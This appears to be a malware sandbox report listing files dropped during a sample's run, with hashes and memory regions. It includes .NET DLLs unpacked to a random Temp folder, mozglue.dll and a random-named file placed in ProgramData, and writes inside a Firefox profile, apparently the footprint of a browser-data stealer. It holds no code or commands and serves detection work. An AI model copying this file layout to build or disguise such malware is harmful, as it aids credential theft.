SHA256 cd1e54c12d47708198c9449b7d06d2b0034d9d9bcb22a5174cc42111bb0913e8
SHA512 05aeafe8fedbb27eb4bd79f07bb05950bbe249b9a773ef5a0ac52052108d944d386ee646af16a0f859a0a1b0f5a56726da6511db3dae5b1721f0519e1bdfbe2a

memory/1776-3325-0x00007FF8A8C30000-0x00007FF8A919F000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\.net\Installation_x64\G4W88503Hx2oLI_7hHhTf85H_RjMA2M=\System.Net.Http.dll

MD5 3005e19fb382841f97af0508814d821a
SHA1 bd74cc9e25f9c503b24a02ae81cbcb3fef3b780e
SHA256 862cdc56d59371f55d8fc88a7fc363268d3c5a347b2ff0d54177484827b07fc3
SHA512 45ae42a2df1eec2646dd552d06a966d03c4a1dfbd245b3ac795c2921060c99d7807a458e78ff2d5efd46c8c1ee6d675e7caf3e36d63525665ad2515a40a6ef4c

C:\Users\Admin\AppData\Local\Temp\.net\Installation_x64\G4W88503Hx2oLI_7hHhTf85H_RjMA2M=\System.Diagnostics.Tracing.dll

MD5 bb1b038b4329e69857e0a74431c2da9a
SHA1 b29a2ce9b720689341fb504cebc3442cfdf30bf0
SHA256 448397f78f01848e46f82dd1044c205a0758fa6f0a5202d25e77e17b1b93b88a
SHA512 207d222e22df4dae4fe6692ff149bd929d92434092950f3668a10cbb0c251f3625305a3244125303c750aaaf5575318e05c90f2bb05c29ea1fbbc67b3765d923

C:\Users\Admin\AppData\Local\Temp\.net\Installation_x64\G4W88503Hx2oLI_7hHhTf85H_RjMA2M=\System.Drawing.Primitives.dll

MD5 f4c82fe039fafec7b956bea280b3b5b4
SHA1 d89362203e929b8fba43d47a8a97542cf6e56c8f
SHA256 6ae911a17cba6dd7d8abb3db5d15a027df0d2f23ea20efc2aca4c0d787dabbbd
SHA512 0c0bc3438edb576d75e16bc17b248dc3bcdaa3c5a4cc1b47bb98a77a180afd59a91ef75f0f33b9ab8953b6eee35d9fb97bb47db2fb6cd33a16b6a482a62a00f3

C:\Users\Admin\AppData\Local\Temp\.net\Installation_x64\G4W88503Hx2oLI_7hHhTf85H_RjMA2M=\PresentationFramework.Aero2.dll

MD5 2d0a981c8d6bac2ff50f07e87b4d03df
SHA1 20c555c0422426c51579b7b22fc6f8efd81d3d00
SHA256 caa19eba3216d8797d97eb3e3b51c5d00a361af2575230a7103822f8d932670a
SHA512 5ade6f1f1416c946c0920a51b1a5306a0f082c07b5478bd052f616aef26094e37263b9d26d00c823f6ce6e288ec8181267eef214f071cc0b79604977cd1b0ef2

C:\Users\Admin\AppData\Local\Temp\.net\Installation_x64\G4W88503Hx2oLI_7hHhTf85H_RjMA2M=\System.Security.Principal.dll

MD5 d7053e07d29f6548738ac17bcc0319a3
SHA1 043015de95e66f0358bf27050d38137124545f71
SHA256 4a8d8f2d5b3e84a3ea268aded9b145d0626f8c226dd9224ddcd0bb236805c935
SHA512 ca5509a27b8b3eeaf0b4b6f3d30965360291f23aed51e805b3467f50a7e899c4bbf2555251508ddec74908261df73e6ba818e8c6c6e3b2933321d23e50aae10a

C:\Users\Admin\AppData\Local\Temp\.net\Installation_x64\G4W88503Hx2oLI_7hHhTf85H_RjMA2M=\System.Net.Primitives.dll

MD5 205911b8991a2ba5c148421a1613af48
SHA1 3fc23e2a1bd880944d1a4b9b3680137e89afca63
SHA256 95dce881993f1ddbc0dbd9fcd69aa99f786251332b7f84a7fc8216eb79c051d4
SHA512 df74439725e7f548782df8e523d7aaf3ae620ce7e3c89e83a5849fbd4f474bafa1c896f389a7340b01c2d43b01750df22272a388cee7bb6eaa0353db4e7f1215

C:\Users\Admin\AppData\Local\Temp\.net\Installation_x64\G4W88503Hx2oLI_7hHhTf85H_RjMA2M=\System.Net.Requests.dll

MD5 cdfde683a8dfcf189e6ef13d79fe6ac2
SHA1 eadf33b7b7d0c9080ae36ebabce595e0c821afe0
SHA256 3ea325baf9b494bffb7a1c3e572ee5305fc3f3d6343e0d1045dd0586a6ea134d
SHA512 3dde40b9335448bec85e48e5201f948cc11d491474fd1aeb97f6ebc901dc99e2078b64d78ac7550e6c4acce5c2392d858e54e019b150d95203ff26093390c925

C:\Users\Admin\AppData\Local\Temp\.net\Installation_x64\G4W88503Hx2oLI_7hHhTf85H_RjMA2M=\System.Threading.ThreadPool.dll

MD5 e3571049c8b45982e1ca741057f4f22c
SHA1 924d696c3a1ff405c957bd69a3570e13e0ffaea4
SHA256 ce8a2fb0ee094be943cded2cb0fac878055b752728674350401e7f1339c9cfbd
SHA512 eb53b2b6ab602e3907c3e4e4d94380538cfba3ac1a42fe33811c20e02024a0add0896154eddcf06890d10435ad27e604cba19e42b3031f1d930680a60dd0e53b

C:\Users\Admin\AppData\Local\Temp\.net\Installation_x64\G4W88503Hx2oLI_7hHhTf85H_RjMA2M=\System.Windows.Extensions.dll

MD5 77265623f14e3d39286c7ff54264ba86
SHA1 d6786e33d02d92e783c3a2b69e632e4bd44f45a6
SHA256 2783ae2cb0d019f44e4d75a0a4d322575d38b9e2a6c3bfd27ce9ca81ed9fc337
SHA512 c5722f1987e8167177fc1e2ff85f5939f28e77de7d7afa0cf85417c91d8b03fb968c3a050838987c469188904c199b2460c804b2021e173e5d7d4ce7aa92c9a3

C:\Users\Admin\AppData\Local\Temp\.net\Installation_x64\G4W88503Hx2oLI_7hHhTf85H_RjMA2M=\System.ComponentModel.TypeConverter.dll

MD5 934f771ed3849265f7cb89866a84b26e
SHA1 f5b3302fdc168514e37c76633ff7dd0968f8c833
SHA256 e73a35f151a08896219ef06673eafa3d17ffe1b9c2e6a57e77d07f2dd243ad54
SHA512 7149ec592a4c60b689e8b196c5b10c22b401f820b47bb9d0be679b36bedb3e5b6054a07396d49cfc4daa1f8d9882494e373b7268349a9cac753c81e61c5cee45

C:\Users\Admin\AppData\Local\Temp\.net\Installation_x64\G4W88503Hx2oLI_7hHhTf85H_RjMA2M=\System.Diagnostics.TraceSource.dll

MD5 66e23826c6e7683c68195dfd20c7e57d
SHA1 01a9225bfac17b3132eba05622a6d75dd26c7b6c
SHA256 196ca48951c0df5d2cd78ceb73b5626aec73f78edde46053ed18560430e67668
SHA512 8582cf5050fc520fbecd866b19d9510c63adde71489daee705022464211d1dc9a6c9996926725ac563cf1a64546ce2bf036427b0bfdfba529a3949dc78889c0d

C:\Users\Admin\AppData\Local\Temp\.net\Installation_x64\G4W88503Hx2oLI_7hHhTf85H_RjMA2M=\System.Resources.ResourceManager.dll

MD5 18e44aa1e31451c58742d50fea127d16
SHA1 3bdb4d9cefcb36b780a43b00df585dbbc128414b
SHA256 32342669f0efbf28f74210b9b7e6e2070b3cf5e1d4f37f7dd3ba3666f8ba5403
SHA512 30dbac2812d033c8d7bed3401b3a0f2adafc6c373df2e177e3c51d7ea6bda7c64a53bd58a5a8dae32647aebe0126a92a66b704f5532a74088045b9ed19a5f22f

C:\Users\Admin\AppData\Local\Temp\.net\Installation_x64\G4W88503Hx2oLI_7hHhTf85H_RjMA2M=\System.ComponentModel.dll

MD5 5443e5c4e2602e2a0afe3f9d4d5cdfb5
SHA1 9c31db28d00d0616afeef4bf3b42b9d5a6a07a1d
SHA256 6ef0ba90e0ae890db91b6b005117b497e944e79b520c098b8f06040503991030
SHA512 2ef249c5eee6bda22fa30d3512d924b79d4d0e283661847d4115760bacd8bc0c358bd637e6b16b0b87ce04fdbbb19a555003dd19b3adcf172635428c17d7d8a6

C:\Users\Admin\AppData\Local\Temp\.net\Installation_x64\G4W88503Hx2oLI_7hHhTf85H_RjMA2M=\System.Security.Cryptography.Algorithms.dll

MD5 c11aa05814eb3441df91a9cba416cf63
SHA1 8b201581b2d8fddc9ec5036323e68be5e19f6a24
SHA256 7862bc0b31f9e06b06fc3271027d4f98b00a4a73bc8b3354933e73dfc9857587
SHA512 3d4f1deb6d50a039923ebe4aa04919baef4c550f3fd99b5336e7398249250a0628ddc4cdf017abefc05514a718237f947fadd9e9a68b77205b511ab2c134f929

C:\Users\Admin\AppData\Local\Temp\.net\Installation_x64\G4W88503Hx2oLI_7hHhTf85H_RjMA2M=\System.Memory.dll

MD5 ec20ad9dc70036d33dbfe26205578f46
SHA1 f5f487dce89180bbe5889c3becd5fc32eba32933
SHA256 dfb494d5654d10101cce8cb98850f2ffd68464bcaa0353109f3aeef8e9b8534c
SHA512 266753705ba6d24227f0c2a5a5660829b61a441b927df48880a14138ebaa5afe779407817be43cb119a22655b4ac3326a6734116550d617bee67511386ecd4ce

C:\Users\Admin\AppData\Local\Temp\.net\Installation_x64\G4W88503Hx2oLI_7hHhTf85H_RjMA2M=\System.Net.WebClient.dll

MD5 44bf76de7f1c343f2fcaa3409da1addd
SHA1 6219d959b052a8fca7cf226ad931b8067b1cb9dc
SHA256 70800e07022069a911ba15e0e287348b61cb6ecedc4a5c051e3ede64074fee89
SHA512 70fd04d7882748f8ca444948fa4998287c517be376a92b34bff1686b8d3a56c10c21d20535d3e06d3e7b88ece237d74211a0cdb8434e73777e0a4406f7a4e958

C:\Users\Admin\AppData\Local\Temp\.net\Installation_x64\G4W88503Hx2oLI_7hHhTf85H_RjMA2M=\System.IO.FileSystem.dll

MD5 7de43fff6887ce2c7e1a3e857d9dae32
SHA1 1c08016b08f44ed510dc3c9b3415c0c437fd6fe6
SHA256 d9c448babdcf592e0fcacdffb395ec66ddc74469e9a7fcf281bdacf4f9be7382
SHA512 c87ebf4e57ca935f51721d72ad8f46b8468513a0ffbea5d001f72be7c94f4c99b0d793cc589517c348e9e20f62eb8303eedfe0ce6fcf2a4a8b5b10ebd4040d06

C:\Users\Admin\AppData\Local\Temp\.net\Installation_x64\G4W88503Hx2oLI_7hHhTf85H_RjMA2M=\System.Private.Xml.dll

MD5 2e0bca776c66205b6ff384b2bcb502e5
SHA1 65ebef087cd75c395d2c57afadb7837181213ba0
SHA256 05d839af14b4f847189259fd2526a7d47c0f0aafacf913224c159364b06f39ee
SHA512 55dec22ff719ba04363037514872cded0b8e6e15c581c3b947b1a7bb5b504fef14601296fe21c259f854b414d2a9d917c5076b63ef71cda49155fd5d89c88941

C:\Users\Admin\AppData\Local\Temp\.net\Installation_x64\G4W88503Hx2oLI_7hHhTf85H_RjMA2M=\System.Configuration.ConfigurationManager.dll

MD5 6914ee97fdcf185fb0a30c62212dbf6a
SHA1 648a55c63641349f548d078eefbf50c5def381e4
SHA256 fa9eabf7d25e38b8f2388489c1fc8ca272a01364137bac26762819ca8f26facf
SHA512 1b7219376c82566d50c49f521436163eda8fb50d9667527a20d355c716ea444b92cbe756d20862e16a768ec067fb8305ef011cde1149cfe9031d0d84479ef50e

C:\Users\Admin\AppData\Local\Temp\.net\Installation_x64\G4W88503Hx2oLI_7hHhTf85H_RjMA2M=\System.Diagnostics.Process.dll

MD5 bf5183f8265c7ab13da680f758dcb596
SHA1 be25478b6c3357e3507d679269d1d4b97c1ef648
SHA256 5f4591a617547661aa486c5b31cf9673be4c95b930a5cf898bd23b07bc1bd8fe
SHA512 5507ab30bd53bd36a6cfe25037d4c3b6e5801a24cbc17973e927b1b9675fb5be2551d73cc3b249bec118928d2d51c560cf5ec8939bd08e178a457f68ea8d3ecf

C:\Users\Admin\AppData\Local\Temp\.net\Installation_x64\G4W88503Hx2oLI_7hHhTf85H_RjMA2M=\System.ComponentModel.Primitives.dll

MD5 ad43b19efb5bf397a7ff7f0c4bc23f3a
SHA1 557831bf876e662941658d45b7a63242229e62fa
SHA256 b95484e1e93daab32a9871faf33800ab3c583b1d830dcbd961a6cfb0cef408bb
SHA512 bcbad6dddcd29c9e7f435fe38472d2cf76a9d2c9af8990a31ce86f051039b6ec2e28c0064a165e62b18883a6091cd9d9361390d4fd63ec6960910139e40f7b52

C:\Users\Admin\AppData\Local\Temp\.net\Installation_x64\G4W88503Hx2oLI_7hHhTf85H_RjMA2M=\System.Collections.Specialized.dll

MD5 bf9a3586fec3260029027a33b85895a9
SHA1 2d1d81a5b8dcbfcd55b736e0f7315427f8a34f18
SHA256 f48f2a6c889e04ed84623a6daa6e8111ec803296ac430ef0c28891d18ffa31d0
SHA512 c384fc356a9f36a6b784d679db68bac7c1b191143ac4bda850cb025926c6d28213cbe10148d4de4899fc04621186326ae26c146b995001a6085a30fd1d4028f0

C:\Users\Admin\AppData\Local\Temp\.net\Installation_x64\G4W88503Hx2oLI_7hHhTf85H_RjMA2M=\Microsoft.Win32.Registry.dll

MD5 893b2cff039236aeb623dd8ea269cded
SHA1 9f0d9c6995e90717c1d8644036d5bedd7740af4b
SHA256 b88fd3261604df67b5c107bf6e8f5449c9504b4040c45629abfaf85c42ff89b0
SHA512 f7c2add8591677ea5baeadf4f168db839f82af75da85425faa8ee48400dbff14daf216365cc5d574abd7b327ee6e9d2a73865768169ec3886a8b30523ae4cebb

C:\Users\Admin\AppData\Local\Temp\.net\Installation_x64\G4W88503Hx2oLI_7hHhTf85H_RjMA2M=\System.Collections.dll

MD5 1a8a403bc2f3e820eb4a362ad02b9888
SHA1 fe9351468302278d53f5f1bb0345480c2662ccef
SHA256 c06b2f5d1c54cc7fca9eceda9bbe3bdd08ec20abf8fa4edae67db2280c233627
SHA512 87fe8047a34149eee08330b746b6ecf6ab6c7cf66edeafb6cca111275b67d08216a8bc96577d98591dfd0f529b811ae89ff6d45b3d92b82d110688f3d64f722b

C:\Users\Admin\AppData\Local\Temp\.net\Installation_x64\G4W88503Hx2oLI_7hHhTf85H_RjMA2M=\System.Collections.NonGeneric.dll

MD5 a8d917449a4d16c59475bff47dbe9c2f
SHA1 2f7c3fff9523d9a68b022808828be263a7fd11c8
SHA256 88a92d9af78bd06d775609ec1a8f20deed6228894992ef66df07720db5902179
SHA512 e03636884e3dce45a0c7604effa36e90089426a802c7e95356b3002898be7a91fcb386101d48c2d5c855234e5b6541e02dc9289cf8a62622cbb8addf177b3e9d

C:\Users\Admin\AppData\Local\Temp\.net\Installation_x64\G4W88503Hx2oLI_7hHhTf85H_RjMA2M=\Microsoft.Win32.Primitives.dll

MD5 27b3ee8d64b2b1290eaf90bfe7d0b009
SHA1 d30b53d53f0258666987f9a9fc15c862c6f36935
SHA256 5905b9e94aae08d2d8e63a5d907493d89f98153ec95b43e241db5e3a3c6f5bb9
SHA512 cc9910757bf24efead841d0632e95bf8a24577bc762391944dd6a82048984140a3f373ccdbaa3f9869e9f38c72213eeaaaad90dd318b3870a4b827e265292c92

C:\Users\Admin\AppData\Local\Temp\.net\Installation_x64\G4W88503Hx2oLI_7hHhTf85H_RjMA2M=\System.Threading.dll

MD5 c8d25e5421e63e07974aa119971b56f5
SHA1 66d4dddd001bb3e432c575cfee094cb6d4dba0bc
SHA256 48f28a34628f517ec1693a5ed02ec30c2cb354a8423c43327825ead731ccadc6
SHA512 bbcc3746c978cc68f14ea735652841068822d606ad63b87538953569a9d683d5df0aa1d6901f65234de82730baf14e652879ffa8ee9fe72328fab91780ebe428

C:\Users\Admin\AppData\Local\Temp\.net\Installation_x64\G4W88503Hx2oLI_7hHhTf85H_RjMA2M=\System.Diagnostics.Debug.dll

MD5 5551bc52714c47940af0805e12d14585
SHA1 98f951c402af93ed679d02036b54cd1d49facf94
SHA256 099b31a6e3afc8afb1519509a13d0dd9ef1474821deeb4fd1141dca6125fbc46
SHA512 4dc740b724804da1c38381c4eb7c9d9eeb2a2fd68b1c427983ab2c2a1a2d51334e929a937d622b4ff1e7caacf6c041f7873774f6e100d14ee3b575b73e8b85e6

C:\Users\Admin\AppData\Local\Temp\.net\Installation_x64\G4W88503Hx2oLI_7hHhTf85H_RjMA2M=\System.Runtime.CompilerServices.VisualC.dll

MD5 a45ad8a8dbd3b7f3e05e687d32d345fb
SHA1 0abc21058719988cb0c5a05de65cc659e929aa66
SHA256 f4991d6cb5d8b9034dfad1b5d66edbf59c86140433cfede99772815104dc178d
SHA512 5ef1598bc15e9b9f2f40901ac4fb35203243538fbe08f87765d5635b1c2467fb08eed21b5c35246082cc872758d9d10668e123f5d8c2e995ef2bacacb096ad11

C:\Users\Admin\AppData\Local\Temp\.net\Installation_x64\G4W88503Hx2oLI_7hHhTf85H_RjMA2M=\System.Runtime.InteropServices.dll

MD5 1076372d4f3d562c2d06ed4e5d7b76fd
SHA1 4ec0e72141aa8684ca22429844626f0fa6b665e9
SHA256 9da45352ed11cd9399be13780e1c5c235cd78e322c9b23acd4ab8ed65b76a67a
SHA512 3384c74d2a0a4fbff144e529c114bcab1265faca3509e41eea5efcf3bcdef2f836ba0e2ba1abec31cea1dcbe61a42afb33590d45c24029664f931966c74c9bdd

C:\Users\Admin\AppData\Local\Temp\.net\Installation_x64\G4W88503Hx2oLI_7hHhTf85H_RjMA2M=\System.Runtime.Extensions.dll

MD5 672d0c20b632d42f14f3c4bd2d9d2739
SHA1 84aee0e0d27900728ef601f68bd5892937453d22
SHA256 2f5fd0ebed622e1ee3da1a0b96adc2e3e2a4bd91d231594acc8d6dbed441b604
SHA512 76e2c44d166412598994c48cfa8426d09ff782b8b6703fce81710576b2998be6bfaa8f675ca67e3ebf056618a839f929ac6d8016f580c331d11f9f96c3018bc1

C:\Users\Admin\AppData\Local\Temp\.net\Installation_x64\G4W88503Hx2oLI_7hHhTf85H_RjMA2M=\DirectWriteForwarder.dll

MD5 a1aec6b3f64bb37ffe136918de13e4f2
SHA1 4ec11db15f285e488f59cf02708ee4b32d505dc5
SHA256 ad94af9432b6d5322d265d60070d3ff49f1ba1012e0c367fc8364d1c595e1ca6
SHA512 14ffca7a127c6f806d5316448a49ac5440d0c7c8f6dc3725b4fd945fa06675ac09e3d33008c9de08af3ffab2ce91fd9c4a3c6a05713464a3115f7ed459b4e539

C:\Users\Admin\AppData\Local\Temp\.net\Installation_x64\G4W88503Hx2oLI_7hHhTf85H_RjMA2M=\PresentationCore.dll

MD5 0b1cca36b80b6681bf3dd5c3fcbc386d
SHA1 0854aef162eca94263e53fb23069cce545849ed6
SHA256 4a5a0264e0b235c4bfe0aaebd58bffb34852ec6c1665324e972a0af8819c2af2
SHA512 4d30522bd344357bddf4f07b67b0d98a8e3517eeb548c047de8d19c7d36692b3c89f757b4efa437e8fb2a099f7367146554f2de277794b015247438b6c330f47

C:\Users\Admin\AppData\Local\Temp\.net\Installation_x64\G4W88503Hx2oLI_7hHhTf85H_RjMA2M=\netstandard.dll

MD5 47eda957551584d4338ee35f5fe6798f
SHA1 4b5220c3f6db4d29a2d98baa972ca3dc9d0a0762
SHA256 f3ea52f01fc8bdf8f9016f5f06d2903f30fc881fd00a025a7751b63e36d8c642
SHA512 cb50fb96c860793bc21c6a9c5017748dc91243e459347599550ed816e5b7c343d5d027294169c39e081e44e42c220b5ae03dba9333832ed93d914a1e58baea2b

C:\Users\Admin\AppData\Local\Temp\.net\Installation_x64\G4W88503Hx2oLI_7hHhTf85H_RjMA2M=\System.IO.Packaging.dll

MD5 0e3910d0ab4f03d456f4fa3147006388
SHA1 fdcfa47b69ecc1c94dbea8c10f7185112e64de1f
SHA256 1aa626b5dc1dd98f92619e7398a3502ca07831fc027ca3cfde665304c7648ef5
SHA512 74b4b9072f32ad3429d14240ae71390aaa35d9561d6040ba4260cb3eca7e9edad06a12d584decaf1f8d3a2d9439944d14c80ad4091734cec9eccc6cc5922f75c

C:\Users\Admin\AppData\Local\Temp\.net\Installation_x64\G4W88503Hx2oLI_7hHhTf85H_RjMA2M=\WindowsBase.dll

MD5 b39792e10bcb9dd57dfd54454c9689e5
SHA1 733788a3646d4690b4221fec4be7c0a58c40bf94
SHA256 cba553542c4ae0bf44523dd2feef65e3b363cedd53a9559fab909ceac0ea54d8
SHA512 c99cdffad83764d1fa74aed3ecc31809d0507733b77ee38d9ce0cbab58ea3aeb874cf037fa22660d63b34bd2a2cb58d2fd2dbaea1c10868127caa3cd77f08d8b

C:\Users\Admin\AppData\Local\Temp\.net\Installation_x64\G4W88503Hx2oLI_7hHhTf85H_RjMA2M=\PresentationFramework.dll

MD5 7bc571bbd86b57b59bc6257ffbb7d139
SHA1 6b808a40dd72dddcb900bfe81ecf296420b49522
SHA256 03d12fee9baa96b1d4c434d17fa9ff8481392dda4d54d6995fb663e0b07bb7dc
SHA512 e7fc98930f72535ff314320e2a6ec8e3d86bf317bb9843306e3e8632695160bb76801cc2bf563d574f7946c42a582c7ebfe9de8ba62f2ef6276445a12b41b633

memory/1860-3340-0x00007FF8A2893000-0x00007FF8A2895000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_jw120ick.m0f.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/1860-3350-0x00000286C8260000-0x00000286C8282000-memory.dmp

memory/1860-3351-0x00007FF8A2890000-0x00007FF8A3351000-memory.dmp

memory/1860-3352-0x00000286C8680000-0x00000286C86C4000-memory.dmp

memory/1860-3353-0x00007FF8A2890000-0x00007FF8A3351000-memory.dmp

memory/1860-3354-0x00000286C8750000-0x00000286C87C6000-memory.dmp

memory/1860-3357-0x00007FF8A2890000-0x00007FF8A3351000-memory.dmp

memory/1776-3358-0x00007FF8A8C30000-0x00007FF8A919F000-memory.dmp

memory/4300-3363-0x0000000000400000-0x000000000045F000-memory.dmp

memory/4300-3366-0x0000000000400000-0x000000000045F000-memory.dmp

memory/4300-3365-0x0000000000400000-0x000000000045F000-memory.dmp

memory/4680-3369-0x0000000000A80000-0x0000000000CE1000-memory.dmp

memory/4680-3372-0x0000000000A80000-0x0000000000CE1000-memory.dmp

memory/4680-3370-0x0000000000A80000-0x0000000000CE1000-memory.dmp

memory/4680-3374-0x0000000061E00000-0x0000000061EF3000-memory.dmp

C:\ProgramData\mozglue.dll

MD5 c8fd9be83bc728cc04beffafc2907fe9
SHA1 95ab9f701e0024cedfbd312bcfe4e726744c4f2e
SHA256 ba06a6ee0b15f5be5c4e67782eec8b521e36c107a329093ec400fe0404eb196a
SHA512 fbb446f4a27ef510e616caad52945d6c9cc1fd063812c41947e579ec2b54df57c6dc46237ded80fca5847f38cbe1747a6c66a13e2c8c19c664a72be35eb8b040

C:\ProgramData\GDBFHDHJKKJDHJJJJKEG

MD5 e6b58580f13a479cbcdcc305c59a41c6
SHA1 3fd7c70d2134a1c290310525e85c22501288970d
SHA256 767970e8d9e58113e4af030cb602d59d382054f12e8864507a93dfb77bbfd445
SHA512 452e1ebb89383c1d0a58b181e96d1678f373da0c2206bc30c7d272af753bc4ec054a26dd95fd73cdc338fda3c69826371a867848a6e411a292f3b3e86dcdaf20

memory/3356-3439-0x0000000000400000-0x0000000000423000-memory.dmp

memory/3356-3440-0x0000000000400000-0x0000000000423000-memory.dmp

memory/2980-3441-0x0000000003340000-0x0000000003376000-memory.dmp

memory/2980-3442-0x0000000005B80000-0x00000000061A8000-memory.dmp

memory/2980-3443-0x0000000005960000-0x0000000005982000-memory.dmp

memory/2980-3444-0x0000000005B00000-0x0000000005B66000-memory.dmp

memory/2980-3445-0x0000000006320000-0x0000000006386000-memory.dmp

memory/2980-3455-0x0000000006390000-0x00000000066E4000-memory.dmp

memory/2980-3456-0x0000000006920000-0x000000000693E000-memory.dmp

memory/2980-3457-0x0000000006950000-0x000000000699C000-memory.dmp

memory/2980-3458-0x0000000008180000-0x00000000087FA000-memory.dmp

memory/2980-3459-0x0000000006E50000-0x0000000006E6A000-memory.dmp

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\g9per00b.default-release\datareporting\glean\db\data.safe.tmp

MD5 835eeea8a10dabb7d3ea3d572076d690
SHA1 17da5b59b767cf988af5adab80ff32fe905775b7
SHA256 a872fad6c893498005b7717cf32074a515864c0e3924b86c2ee45ab64b40eb09
SHA512 754e4d04ad973b4223333211056e7c03d1e1c5ad71d24f0dba4f5dfc05a614b23d7d07c397f6417304debe34a84241e13a483f28e8894912b64ef34d34b35b3b

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\6824f4a902c78fbd.customDestinations-ms

MD5 40c623a094bd5d6047d290ae4ce3c5bd
SHA1 414373babb59c6baebed7049afc03618b91c3453
SHA256 76cdbf3fb7f73c10c9e681b3e84a3299b0d792d8e47c86791f8f68ab97d88bad
SHA512 7bd916135c9e1dd28f2ae5746ad1f07f9014c142a3c32c8ea93533a3ef3928880623f177d25b6c95237805bea7c59959d3c26974eb43affa3410a5ac51078d2d

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\6824f4a902c78fbd.customDestinations-ms

MD5 0651daa3a24f4f129b1e67682db8e107
SHA1 887472be53a9234ca118c44e2de33ee01072a4c5
SHA256 1e53ba358a42f4e44472f1eccd157d361815993a787d33005b2abd45c4d60afc
SHA512 678ea735ac31583714d3372c83f8d2e61e7965c4627b380974296860211db4b87fbbd0ff3be370cb4c6c9196556fdcbb3217328439f24e8ff8a74ae8be611190

memory/2980-3473-0x0000000007F40000-0x0000000007F4A000-memory.dmp

memory/2980-3474-0x0000000009D30000-0x000000000A25C000-memory.dmp

memory/2980-3475-0x0000000009800000-0x00000000099C2000-memory.dmp

memory/2980-3476-0x0000000008060000-0x00000000080F6000-memory.dmp

memory/2980-3477-0x0000000008010000-0x0000000008032000-memory.dmp

memory/2980-3478-0x000000000A810000-0x000000000ADB4000-memory.dmp

memory/2980-3480-0x0000000005680000-0x0000000005692000-memory.dmp

memory/2980-3580-0x000000000A310000-0x000000000A3A2000-memory.dmp

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\g9per00b.default-release\datareporting\glean\db\data.safe.tmp

MD5 d2dc06c067643b1f451700ac3844e74d
SHA1 54ffac00f5c0e5211c682bbcb1cac7b08aec53aa
SHA256 109b435e3de82c4c4b1bd3c1e301fe2ae0591c632fdcb50dd0be11bb53424c2b
SHA512 638d3cb22a40410c18930878e72215a08909d6853fbc2932bd8f24ba4651e03da68f6ddcc255287757b2f50d69555c1c27ad7233fc6314f9822d1fd319bc4cd0